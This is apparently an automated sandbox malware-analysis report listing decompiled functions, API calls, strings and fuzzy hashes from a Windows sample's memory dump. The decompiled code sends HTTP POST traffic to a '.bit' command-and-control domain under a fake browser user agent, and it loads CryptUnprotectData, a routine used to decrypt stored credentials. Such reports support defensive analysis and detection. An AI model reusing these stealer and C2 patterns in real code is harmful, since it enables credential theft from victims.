				E00404F5C();
				E00404F5C();
				 *_t376 = 0x3c;
				 *((intOrPtr*)(_t376 + 4)) =  &_v132;
				 *((intOrPtr*)(_t376 + 8)) = 0x20;
				 *(_t376 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t376 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t376 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t376 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t376 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t376 + 0x28)) = 0x80;
				 *(_t376 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t376 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t376 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t376 + 0x38)) = 0x400;
				_t224 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t224, 0x90000000, _t376);
				E004036DC( &_v100,  *(_t376 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403AD4(0x418374, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t376 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417668(_v100, _t329,  &_v69424, _t376, _t378);
					 *(_t376 + 0x10) = E00403990(_v69424);
				}
				_t330 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				if(_t330 != 0) {
					_v84 = 0x2dc6c0;
					_v48(_t330, 6,  &_v84, 4);
					_v48(_t330, 5,  &_v84, 4);
					_v64 = InternetConnectA(_t330,  *(_t376 + 0x10),  *(_t376 + 0x18), 0, 0, 3, 0, 0);
					if(_v64 != 0) {
						_v80 = 0x84003300;
						E004036DC( &_v69428,  *((intOrPtr*)(_t376 + 4)));
						if(E00403AD4(0x4183c8, _v69428) != 0) {
							_v80 = _v80 | 0x00800000;
						}
						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t376 + 0x2c), 0, 0, 0, _v80, 0);
						if(_v68 != 0) {
							if(_v73 != 0) {
								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
							}
							_t293 = E00403790(_v12);
							if(HttpSendRequestA(_v68, 0x4183cc, 0, E00403990(_v12), _t293) != 0) {
								do {
									E00404F5C();
									_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
									E004035D4( &_v96, _v60,  &_v69412);
									_t307 = E00403798( &_v92, _v96);
									asm("sbb eax, eax");
								} while (_t307 + 1 != 0 && _v60 != 0);
							}
						}
						InternetCloseHandle(_v68); // executed
					}
					 *_t378(_v64);
				}
				 *_t378(_t330);
				_t396 = _v92;
				if(_t396 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t376 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t376 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t376 + 0x10));
					_pop(_t365); // executed
					E00417820(_v69436, _t330, _v16, _t365, _t378); // executed
				}
				E004038DC(_v16, 0x4182ac);
				if(_t396 == 0) {
					E0040627C(_v100, _t330,  &_v69440, _t378, _t396);
					E004038DC(_v69440, "BFFAECB1");
					if(_t396 != 0) {
						E004034E4( &_v92);
					}
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t356);
				 *[fs:eax] = _t356;
				_push(E00418299);
				E00403508( &_v69440, 7);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}

0x00417d85
0x00417d88
0x00417d8d
0x00417d8d
0x00417d8f
0x00417d91
0x00417d91
0x00417d94
0x00417d94
0x00417d9a
0x00417d9d
0x00417da0
0x00417da6
0x00417dae
0x00417db6
0x00417dbb
0x00417dc3
0x00417dc4
0x00417dc9
0x00417dcc
0x00417dd3
0x00417ddd
0x00417ddd
0x00417de5
0x00417df0
0x00417df5
0x00417e01
0x00417e14
0x00417e18
0x00417e23
0x00417e28
0x00417e28
0x00417e3c
0x00417e51
0x00417e66
0x00417e7b
0x00417e90
0x00417ea5
0x00417eba
0x00417ed0
0x00417ee7
0x00417ef2
0x00417f02
0x00417f12
0x00417f22
0x00417f32
0x00417f42
0x00417f4e
0x00417f53
0x00417f5c
0x00417f5f
0x00417f6c
0x00417f6f
0x00417f7c
0x00417f7f
0x00417f8c
0x00417f8f
0x00417f9c
0x00417f9f
0x00417fac
0x00417faf
0x00417fbf
0x00417fce
0x00417fd7
0x00417ff8
0x0041800f
0x00418011
0x0041801e
0x00418031
0x0041803f
0x0041804f
0x0041804f
0x00418062
0x00418066
0x0041806c
0x0041807c
0x00418088
0x004180a2
0x004180a9
0x004180af
0x004180bf
0x004180d6
0x004180d8
0x004180d8
0x004180ff
0x00418106
0x00418110
0x0041812d
0x0041812d
0x00418133
0x00418152
0x00418154
0x0041815f
0x0041817b
0x0041818a
0x00418195
0x0041819e
0x004181a1
0x00418154
0x00418152
0x004181af
0x004181af
0x004181b5
0x004181b5
0x004181b8
0x004181ba
0x004181be
0x004181c3
0x004181c7
0x004181cc
0x004181d0
0x004181da
0x004181e5
0x004181ef
0x004181fd
0x004181fe
0x004181fe
0x0041820b
0x00418210
0x0041821b
0x0041822b
0x00418230
0x00418235
0x00418235
0x00418230
0x00418240
0x00418248
0x0041824f
0x00418252
0x00418255
0x00418265
0x00418272
0x0041827f
0x00418291

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 004181AF

Strings

wininet.dll, xrefs: 00417DFC
Host: , xrefs: 0041802C
.bit, xrefs: 00418003
BFFAECB1, xrefs: 00418226
POST, xrefs: 00417DD8, 00418206
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041805A

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackLibraryLoadModuleSend
String ID: .bit$BFFAECB1$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 4078552840-3371649330
Opcode ID: 2b4b4733ef8c69b113706a3773455fa777878b07cc7296605ca0cfe3be8cc055
Instruction ID: 25a4a03a9f7ad5ca19830e541fee6fd6c7da8d6099e3497fbdcec988a6cf554b
Opcode Fuzzy Hash: 2b4b4733ef8c69b113706a3773455fa777878b07cc7296605ca0cfe3be8cc055
Instruction Fuzzy Hash: 1CE1FFB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00423E58, Relevance: 35.7, APIs: 13, Strings: 7, Instructions: 723windowmemoryregistryCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042402D
LocalAlloc.KERNEL32(00000000,00000932), ref: 00424052
LocalAlloc.KERNEL32(00000000,00000932), ref: 0042405D
GetCaretPos.USER32(?), ref: 0042406C
GetMessageExtraInfo.USER32 ref: 00424072
RegisterClassExW.USER32(?), ref: 0042408F
WriteConsoleOutputCharacterA.KERNEL32(0298B9C0,00426E00,0045A200,?,?), ref: 004240F9
ExtractIconW.SHELL32(00000000,00000000,00000000), ref: 00424102
GetCPInfo.KERNEL32(00000000,?), ref: 00424122
GetMenuInfo.USER32(00000000,?), ref: 00424131
LoadLibraryW.KERNEL32(00426E5C), ref: 00424183
ValidateRect.USER32(00000000,?), ref: 004241CC
VirtualProtect.KERNEL32(?,00000020,141C9E5F,0042BD10), ref: 00424231

Strings

!"A, xrefs: 00423FFF
cie, xrefs: 00423EC7
O:mO, xrefs: 00423E6F
@, xrefs: 0042416D
WL#, xrefs: 00423E9F
2, xrefs: 004241EF
2, xrefs: 0042403F

Memory Dump Source

Source File: 00000008.00000002.318472383.0000000000420000.00000020.00020000.sdmp, Offset: 00420000, based on PE: false

Similarity

API ID: Info$AllocLocalMessage$CaretCharacterClassConsoleExtraExtractIconLibraryLoadMenuOutputPeekProtectRectRegisterValidateVirtualWrite
String ID: !"A$2$2$@$O:mO$cie$WL#
API String ID: 879752413-1578198310
Opcode ID: 461a9594598ad668c5f8a8ece0d8849dba16dbee436ee6f737507edb48c46373
Instruction ID: 46e7383d6b3b83ba71d2826d2030b76d812b7499b7ad53bbf139bff0179ee076
Opcode Fuzzy Hash: 461a9594598ad668c5f8a8ece0d8849dba16dbee436ee6f737507edb48c46373
Instruction Fuzzy Hash: 7E3264728087599BC712FBB59CC49AEBBACBE84204F450D1FF19182110EB3CD64A9F5B

Uniqueness

Uniqueness Score: -1.00%

Function 00423DFC, Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00423E11
SetThreadDesktop.USER32(00000000), ref: 00423E29
FindCloseChangeNotification.KERNEL32(00000000), ref: 00423E30
FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 00423E39
GetCurrentDirectoryW.KERNEL32(00000000,0042AAB0), ref: 00423E45

Memory Dump Source

Source File: 00000008.00000002.318472383.0000000000420000.00000020.00020000.sdmp, Offset: 00420000, based on PE: false

Similarity

API ID: ChangeFindNotification$CloseCurrentDesktopDirectoryErrorFirstLastThread
String ID:
API String ID: 2430865054-0
Opcode ID: ae33c361d4d1c904004cfaaf6d68eeb53fa06642d671418d24039050ded46a3d
Instruction ID: b358735cfd6ce57b15c63774e713db9e1e7042df6d1857ce10b062e8ee3a8830
Opcode Fuzzy Hash: ae33c361d4d1c904004cfaaf6d68eeb53fa06642d671418d24039050ded46a3d
Instruction Fuzzy Hash: 73F0D036610514BB87216F66FCC9D6F3B7CFFC6B65380802AF505860118A78594BDBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00406BD8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00406BD8(void* __eax) {
				char _v516;
				int _v520;
				void* _v524;
				long _t13;
				long _t19;
				intOrPtr* _t21;
				void* _t26;

				_t26 = __eax;
				_v520 = 0x100;
				E00403C18(__eax, 0x406c70);
				_t13 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0, 0, 0x20019, 0,  &_v524, 0); // executed
				if(_t13 == 0) {
					_t19 = RegQueryValueExW(_v524, L"ProductName", 0, 0,  &_v516,  &_v520); // executed
					if(_t19 == 0) {
						E00403D6C(_t26, 0x100,  &_v516);
					}
					_t21 =  *0x41b1fc; // 0x41c714
					return  *((intOrPtr*)( *_t21))(_v524);
				}
				return _t13;
			}

0x00406bdf
0x00406be1
0x00406bf0
0x00406c1a
0x00406c1e
0x00406c3f
0x00406c43
0x00406c50
0x00406c50
0x00406c59
0x00000000
0x00406c60
0x00406c69

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F

Strings

ProductName, xrefs: 00406C2E
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCreateQueryStringValue
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1441758775-1787575317
Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6AA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A6AA() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41ca68 =  *0x41ca68 - 1;
				if( *0x41ca68 < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41ca64 = _t3;
					return _t3;
				}
				return _t1;
			}

0x0040a6ac
0x0040a6b3
0x0040a6bf
0x0040a6c5
0x0040a6ca
0x00000000
0x0040a6ca
0x0040a6cf

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5

Strings

CryptUnprotectData, xrefs: 0040A6B5
crypt32.dll, xrefs: 0040A6BA

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
Opcode Fuzzy Hash: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F

Uniqueness

Uniqueness Score: -1.00%

Function 00401870, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401870() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x41c5b4);
				L004011C4();
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x41c60c = _t11;
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011D4();
					return 0;
				}
				return 0;
			}

0x00401875
0x00401876
0x0040187b
0x0040187e
0x00401881
0x00401886
0x00401892
0x00401894
0x00401899
0x00401899
0x004018a3
0x004018ad
0x004018b7
0x004018c3
0x004018c8
0x004018d4
0x004018d6
0x004018db
0x004018db
0x004018e3
0x004018e7
0x004018e8
0x004018f4
0x004018f7
0x004018f9
0x004018fe
0x004018fe
0x00401907
0x0040190a
0x0040190d
0x00401919
0x0040191b
0x00401920
0x00000000
0x00401920
0x00401925

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F5C, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00407D14, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AccountFreeLookup
String ID:
API String ID: 3905513331-0
Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004033F4, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033F4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L3:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t32);
						 *0x41b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
							 *0x0041C634 = 0;
						}
						E004031DC();
						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
							_t14 =  *0x0041C638;
							if( *0x0041C638 != 0) {
								E004048EC(_t14);
								_t35 =  *((intOrPtr*)(0x41c638));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E004031B4();
						if( *((char*)(0x41c650)) == 1) {
							 *0x0041C64C();
						}
						if( *((char*)(0x41c650)) != 0) {
							E00403338();
						}
						if( *0x41c628 == 0) {
							if( *0x41c018 != 0) {
								 *0x41c018();
							}
							ExitProcess( *0x41b000); // executed
						}
						memcpy(0x41c628,  *0x41c628, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x41b000 = 0x41b000;
					}
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L3;
				}
			}

0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x00000000
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x004034c1
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004033EC, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033EC() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L5:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t36);
						 *0x41b004 = 0;
					}
					L7:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t17 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E004048EC(_t17);
							_t39 =  *((intOrPtr*)(0x41c638));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x41b000 = 0x41b000;
					goto L7;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L5;
				}
			}

0x004033ee
0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x00000000
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004033F0, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033F0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L4:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t35);
						 *0x41b004 = 0;
					}
					L6:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t16 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E004048EC(_t16);
							_t38 =  *((intOrPtr*)(0x41c638));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x41b000 = 0x41b000;
					goto L6;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L4;
				}
			}

0x0040340b
0x00403423
0x0040342a
0x0040342c
0x00403431
0x00403438
0x00403438
0x0040343d
0x00403441
0x0040344a
0x0040344a
0x0040344d
0x00403456
0x0040345d
0x00403462
0x00403464
0x00403469
0x0040346c
0x0040346c
